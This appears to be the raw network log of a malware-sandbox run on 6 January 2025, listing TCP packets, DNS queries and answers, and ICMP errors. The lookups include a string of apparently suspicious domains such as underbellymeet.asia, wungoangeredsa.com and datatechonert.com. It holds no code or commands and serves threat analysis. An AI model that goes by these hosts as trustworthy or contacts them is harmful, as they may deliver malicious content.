                                                                                                          Jan 6, 2025 12:09:26.975877047 CET44350171104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:26.976437092 CET50170443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:26.976489067 CET44350170104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:26.976676941 CET50172443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:26.976686001 CET44350172104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:26.976775885 CET50171443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:26.976783991 CET44350171104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:26.976866007 CET50170443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:26.976871014 CET44350170104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.018281937 CET50171443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:27.018464088 CET50170443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:27.018487930 CET50172443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:27.102072954 CET44350172104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.102107048 CET44350172104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.102134943 CET44350172104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.102153063 CET50172443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:27.102171898 CET44350172104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.102205992 CET44350172104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.102222919 CET50172443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:27.102231979 CET44350172104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.102269888 CET50172443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:27.102277040 CET44350172104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.102772951 CET44350172104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.102813005 CET44350172104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.102832079 CET50172443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:27.102868080 CET50172443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:27.103535891 CET50172443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:27.103552103 CET44350172104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.106918097 CET44350171104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.106952906 CET44350171104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.106987000 CET44350171104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.106995106 CET50171443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:27.107013941 CET44350171104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.107044935 CET44350171104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.107053995 CET50171443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:27.107060909 CET44350171104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.107093096 CET50171443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:27.107723951 CET44350171104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.108109951 CET44350171104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.108155966 CET44350171104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.108159065 CET50171443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:27.108167887 CET44350171104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.108201027 CET44350171104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.108208895 CET50171443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:27.108217001 CET44350171104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.108253002 CET44350171104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.108264923 CET50171443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:27.108298063 CET50171443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:27.109129906 CET50171443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:27.109143019 CET44350171104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.115438938 CET44350170104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.115480900 CET44350170104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.115504026 CET44350170104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.115525961 CET50170443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:27.115535021 CET44350170104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.115571976 CET50170443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:27.115621090 CET44350170104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.115664005 CET44350170104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.115701914 CET50170443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:27.115709066 CET44350170104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.116494894 CET44350170104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.116519928 CET44350170104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.116538048 CET50170443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:27.116543055 CET44350170104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.116559029 CET44350170104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:27.116580963 CET50170443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:27.116606951 CET50170443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:27.116883039 CET50170443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:27.116890907 CET44350170104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:33.673875093 CET44350061104.18.3.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:33.673939943 CET44350061104.18.3.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:33.673985004 CET50061443192.168.2.4104.18.3.4
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jan 6, 2025 12:06:36.346931934 CET5840453192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:06:44.854737043 CET138138192.168.2.4192.168.2.255
                                                                                                          Jan 6, 2025 12:06:49.266990900 CET6306953192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:06:49.267123938 CET5505953192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:06:49.270351887 CET53529701.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:06:49.274439096 CET53567731.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:06:49.545835018 CET53550591.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:06:49.545851946 CET53630691.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:06:50.271059036 CET53587691.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:06:51.284041882 CET53491641.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:06:51.843741894 CET5627453192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:06:51.844063044 CET6390153192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:06:52.121881962 CET53639011.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:06:52.123106956 CET53562741.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:06:53.038058043 CET6485053192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:06:53.038186073 CET5958653192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:06:53.148426056 CET53584021.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:06:53.887248039 CET5581853192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:06:53.887554884 CET6105353192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:06:53.893850088 CET53558181.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:06:53.894376993 CET53610531.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:06:53.977417946 CET6322653192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:06:53.977565050 CET6537553192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:07:01.567120075 CET53556691.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:07:49.178746939 CET53615661.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:10.104136944 CET5239253192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:09:10.104276896 CET6029853192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:09:10.117419958 CET53523921.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:10.121926069 CET53602981.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:11.408236980 CET5988153192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:09:11.408373117 CET5116553192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:09:11.416208029 CET53511651.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:11.416801929 CET53598811.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:12.644892931 CET6276653192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:09:12.645041943 CET6320453192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:09:12.652018070 CET53627661.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:12.652446032 CET53632041.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:14.378472090 CET5107753192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:09:14.378629923 CET6391253192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:09:14.386781931 CET53510771.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:14.499659061 CET53639121.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:18.243872881 CET5151253192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:09:18.244126081 CET5674453192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:09:18.262835979 CET53515121.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:18.419318914 CET53567441.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:18.989859104 CET4955253192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:09:18.990243912 CET5785353192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:09:19.027245045 CET53495521.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:19.027256012 CET53578531.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:19.823297024 CET6141853192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:09:19.823695898 CET6404153192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:09:19.824784994 CET6083053192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:09:19.825236082 CET5204953192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:09:19.830074072 CET53614181.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:19.830348015 CET53640411.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:19.831664085 CET53608301.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:19.833501101 CET53520491.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:20.502145052 CET4986453192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:09:20.502302885 CET5968353192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:09:20.516077042 CET53498641.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:20.668898106 CET53596831.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:22.082494974 CET4940753192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:09:22.082776070 CET5308253192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:09:22.089812040 CET53494071.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:22.089981079 CET53530821.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:22.097037077 CET53635781.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:22.276633024 CET5338553192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:09:22.276772022 CET5828653192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:09:22.283613920 CET53533851.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:22.283626080 CET53582861.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:22.681603909 CET4941153192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:09:22.681796074 CET6486553192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:09:22.688884974 CET53494111.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:22.688898087 CET53648651.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:23.178018093 CET5955653192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:09:23.178261995 CET4919553192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:09:23.179192066 CET6143753192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:09:23.179330111 CET5551653192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:09:23.184832096 CET53595561.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:23.185132980 CET53491951.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:23.185915947 CET53614371.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:23.186144114 CET53555161.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:23.882536888 CET5044453192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:09:23.882747889 CET5094353192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:09:23.889734030 CET53504441.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:23.889796019 CET53509431.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.058568954 CET5318753192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:09:24.059130907 CET5519053192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:09:24.065577984 CET53551901.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.065901041 CET53531871.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.338011026 CET6339453192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:09:24.338164091 CET5406853192.168.2.41.1.1.1
                                                                                                          Jan 6, 2025 12:09:24.345664978 CET53633941.1.1.1192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.345726013 CET53540681.1.1.1192.168.2.4
                                                                                                          TimestampSource IPDest IPChecksumCodeType
                                                                                                          Jan 6, 2025 12:09:14.502604008 CET192.168.2.41.1.1.1c236(Port unreachable)Destination Unreachable
                                                                                                          Jan 6, 2025 12:09:18.419379950 CET192.168.2.41.1.1.1c21e(Port unreachable)Destination Unreachable
                                                                                                          Jan 6, 2025 12:09:20.669138908 CET192.168.2.41.1.1.1c222(Port unreachable)Destination Unreachable
                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Jan 6, 2025 12:06:36.346931934 CET192.168.2.41.1.1.10x149dStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:06:49.266990900 CET192.168.2.41.1.1.10xdffeStandard query (0)bohlepropiedades.comA (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:06:49.267123938 CET192.168.2.41.1.1.10xc69eStandard query (0)bohlepropiedades.com65IN (0x0001)false
                                                                                                          Jan 6, 2025 12:06:51.843741894 CET192.168.2.41.1.1.10x7035Standard query (0)bohlepropiedades.comA (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:06:51.844063044 CET192.168.2.41.1.1.10xbda9Standard query (0)bohlepropiedades.com65IN (0x0001)false
                                                                                                          Jan 6, 2025 12:06:53.038058043 CET192.168.2.41.1.1.10x9132Standard query (0)imagizer.imageshack.comA (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:06:53.038186073 CET192.168.2.41.1.1.10xd53Standard query (0)imagizer.imageshack.com65IN (0x0001)false
                                                                                                          Jan 6, 2025 12:06:53.887248039 CET192.168.2.41.1.1.10x3f82Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:06:53.887554884 CET192.168.2.41.1.1.10x873aStandard query (0)www.google.com65IN (0x0001)false
                                                                                                          Jan 6, 2025 12:06:53.977417946 CET192.168.2.41.1.1.10xce99Standard query (0)imagizer.imageshack.comA (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:06:53.977565050 CET192.168.2.41.1.1.10x609dStandard query (0)imagizer.imageshack.com65IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:10.104136944 CET192.168.2.41.1.1.10xe7c6Standard query (0)www.umbrellaland.fitA (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:10.104276896 CET192.168.2.41.1.1.10xb94aStandard query (0)www.umbrellaland.fit65IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:11.408236980 CET192.168.2.41.1.1.10x9484Standard query (0)www.terrificstrands.digitalA (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:11.408373117 CET192.168.2.41.1.1.10x1288Standard query (0)www.terrificstrands.digital65IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:12.644892931 CET192.168.2.41.1.1.10x1c0dStandard query (0)azz.underbellymeet.asiaA (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:12.645041943 CET192.168.2.41.1.1.10xc079Standard query (0)azz.underbellymeet.asia65IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:14.378472090 CET192.168.2.41.1.1.10xec0Standard query (0)azz.underbellymeet.asiaA (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:14.378629923 CET192.168.2.41.1.1.10xf64Standard query (0)azz.underbellymeet.asia65IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:18.243872881 CET192.168.2.41.1.1.10xcba4Standard query (0)juvuthoors.comA (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:18.244126081 CET192.168.2.41.1.1.10x7445Standard query (0)juvuthoors.com65IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:18.989859104 CET192.168.2.41.1.1.10xbc90Standard query (0)wungoangeredsa.comA (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:18.990243912 CET192.168.2.41.1.1.10x7c2bStandard query (0)wungoangeredsa.com65IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:19.823297024 CET192.168.2.41.1.1.10x92e7Standard query (0)my.rtmark.netA (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:19.823695898 CET192.168.2.41.1.1.10xdeb8Standard query (0)my.rtmark.net65IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:19.824784994 CET192.168.2.41.1.1.10xa69fStandard query (0)browser.sentry-cdn.comA (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:19.825236082 CET192.168.2.41.1.1.10xe2c6Standard query (0)browser.sentry-cdn.com65IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:20.502145052 CET192.168.2.41.1.1.10x2d6cStandard query (0)wungoangeredsa.comA (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:20.502302885 CET192.168.2.41.1.1.10x482cStandard query (0)wungoangeredsa.com65IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:22.082494974 CET192.168.2.41.1.1.10x8d16Standard query (0)cdntechone.comA (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:22.082776070 CET192.168.2.41.1.1.10x4413Standard query (0)cdntechone.com65IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:22.276633024 CET192.168.2.41.1.1.10x3185Standard query (0)my.rtmark.netA (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:22.276772022 CET192.168.2.41.1.1.10xc942Standard query (0)my.rtmark.net65IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:22.681603909 CET192.168.2.41.1.1.10x688Standard query (0)forspearowor.comA (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:22.681796074 CET192.168.2.41.1.1.10x86b3Standard query (0)forspearowor.com65IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:23.178018093 CET192.168.2.41.1.1.10x8ed8Standard query (0)datatechone.comA (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:23.178261995 CET192.168.2.41.1.1.10x9a6Standard query (0)datatechone.com65IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:23.179192066 CET192.168.2.41.1.1.10x114cStandard query (0)datatechonert.comA (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:23.179330111 CET192.168.2.41.1.1.10xddf6Standard query (0)datatechonert.com65IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:23.882536888 CET192.168.2.41.1.1.10x7406Standard query (0)cdntechone.comA (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:23.882747889 CET192.168.2.41.1.1.10x8d8bStandard query (0)cdntechone.com65IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:24.058568954 CET192.168.2.41.1.1.10xdb6dStandard query (0)datatechonert.comA (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:24.059130907 CET192.168.2.41.1.1.10xa94Standard query (0)datatechonert.com65IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:24.338011026 CET192.168.2.41.1.1.10x6586Standard query (0)forspearowor.comA (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:24.338164091 CET192.168.2.41.1.1.10xf6f2Standard query (0)forspearowor.com65IN (0x0001)false
                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Jan 6, 2025 12:06:36.354362011 CET1.1.1.1192.168.2.40x149dNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:06:37.045281887 CET1.1.1.1192.168.2.40x76e7No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:06:37.045281887 CET1.1.1.1192.168.2.40x76e7No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:06:49.545851946 CET1.1.1.1192.168.2.40xdffeNo error (0)bohlepropiedades.com162.214.122.223A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:06:52.123106956 CET1.1.1.1192.168.2.40x7035No error (0)bohlepropiedades.com162.214.122.223A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:06:53.045917034 CET1.1.1.1192.168.2.40xd53No error (0)imagizer.imageshack.comimagizer.imageshack.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:06:53.046967030 CET1.1.1.1192.168.2.40x9132No error (0)imagizer.imageshack.comimagizer.imageshack.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:06:53.893850088 CET1.1.1.1192.168.2.40x3f82No error (0)www.google.com142.250.185.68A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:06:53.894376993 CET1.1.1.1192.168.2.40x873aNo error (0)www.google.com65IN (0x0001)false
                                                                                                          Jan 6, 2025 12:06:53.984431028 CET1.1.1.1192.168.2.40x609dNo error (0)imagizer.imageshack.comimagizer.imageshack.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:06:53.985801935 CET1.1.1.1192.168.2.40xce99No error (0)imagizer.imageshack.comimagizer.imageshack.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:10.117419958 CET1.1.1.1192.168.2.40xe7c6No error (0)www.umbrellaland.fitumbrellaland.fitCNAME (Canonical name)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:10.117419958 CET1.1.1.1192.168.2.40xe7c6No error (0)umbrellaland.fit51.68.82.147A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:10.117419958 CET1.1.1.1192.168.2.40xe7c6No error (0)umbrellaland.fit51.68.85.158A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:10.117419958 CET1.1.1.1192.168.2.40xe7c6No error (0)umbrellaland.fit51.68.81.31A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:10.121926069 CET1.1.1.1192.168.2.40xb94aNo error (0)www.umbrellaland.fitumbrellaland.fitCNAME (Canonical name)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:11.416208029 CET1.1.1.1192.168.2.40x1288No error (0)www.terrificstrands.digital65IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:11.416801929 CET1.1.1.1192.168.2.40x9484No error (0)www.terrificstrands.digital188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:11.416801929 CET1.1.1.1192.168.2.40x9484No error (0)www.terrificstrands.digital188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:12.652018070 CET1.1.1.1192.168.2.40x1c0dNo error (0)azz.underbellymeet.asia67.212.184.148A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:14.386781931 CET1.1.1.1192.168.2.40xec0No error (0)azz.underbellymeet.asia67.212.184.148A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:18.262835979 CET1.1.1.1192.168.2.40xcba4No error (0)juvuthoors.com104.18.3.4A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:18.262835979 CET1.1.1.1192.168.2.40xcba4No error (0)juvuthoors.com104.18.2.4A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:19.027245045 CET1.1.1.1192.168.2.40xbc90No error (0)wungoangeredsa.com104.18.2.4A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:19.027245045 CET1.1.1.1192.168.2.40xbc90No error (0)wungoangeredsa.com104.18.3.4A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:19.830074072 CET1.1.1.1192.168.2.40x92e7No error (0)my.rtmark.net188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:19.830074072 CET1.1.1.1192.168.2.40x92e7No error (0)my.rtmark.net188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:19.830348015 CET1.1.1.1192.168.2.40xdeb8No error (0)my.rtmark.net65IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:19.831664085 CET1.1.1.1192.168.2.40xa69fNo error (0)browser.sentry-cdn.com151.101.130.217A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:19.831664085 CET1.1.1.1192.168.2.40xa69fNo error (0)browser.sentry-cdn.com151.101.194.217A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:19.831664085 CET1.1.1.1192.168.2.40xa69fNo error (0)browser.sentry-cdn.com151.101.66.217A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:19.831664085 CET1.1.1.1192.168.2.40xa69fNo error (0)browser.sentry-cdn.com151.101.2.217A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:20.516077042 CET1.1.1.1192.168.2.40x2d6cNo error (0)wungoangeredsa.com104.18.2.4A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:20.516077042 CET1.1.1.1192.168.2.40x2d6cNo error (0)wungoangeredsa.com104.18.3.4A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:22.089812040 CET1.1.1.1192.168.2.40x8d16No error (0)cdntechone.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:22.089812040 CET1.1.1.1192.168.2.40x8d16No error (0)cdntechone.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:22.089981079 CET1.1.1.1192.168.2.40x4413No error (0)cdntechone.com65IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:22.283613920 CET1.1.1.1192.168.2.40x3185No error (0)my.rtmark.net188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:22.283613920 CET1.1.1.1192.168.2.40x3185No error (0)my.rtmark.net188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:22.283626080 CET1.1.1.1192.168.2.40xc942No error (0)my.rtmark.net65IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:22.688884974 CET1.1.1.1192.168.2.40x688No error (0)forspearowor.com104.18.3.4A (IP address)IN (0x0001)false
